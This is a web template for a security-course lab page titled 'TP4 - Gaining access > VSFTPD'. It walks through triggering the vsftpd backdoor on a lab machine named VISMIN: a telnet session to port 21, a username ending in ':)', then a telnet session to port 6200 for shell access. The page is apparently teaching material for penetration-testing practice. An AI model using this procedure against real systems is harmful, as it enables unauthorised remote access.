{% extends "base.html" %}
{% block title %}SRIE > TP4 - Gaining access > VSFTPD{% endblock %}
{% block content %}
<div class="container p-5 my-5">
    <h2 class="text-center"> TP4 - Gaining access > VSFTPD</h2>
    <div class="container p-5 mt-1 mb-3">
        <p class="lead">
            You can exploit VSFTPD backdoor manually in some case. </p>
    </div>

    <hr>
    <!-- Installation section -->
    <h3 class="text-center">How it works</h3>

    <div class="container p-5 mt-1 mb-3">
        <p class="lead">The process is consisting of : <br><br> 1-Connect with telnet on a specific port <br> 2-Complete
            the
            form with specific values <br> 3-This will open another port <br> 4-Use telnet on this port to penetrate the
            remote system</p>
    </div>
    <hr>

    <h3 class="text-center">How to (example with VISMIN)</h3>

    <div class="container p-5 mt-1 mb-3">
        <code class="p-5">{% raw %}telnet ip_of_vismin 21{% endraw %}</code>

        <p class="lead"><br>Complete the form with the following values : <br> USER user:) <br> PASS pass<br></p>
        <code class="p-5">{% raw %}telnet ip_of_vismin 6200{% endraw %}</code>
        <p class="lead"><br><br>And now, you are done. </p>
    </div>
    <hr>
</div>
{% endblock %}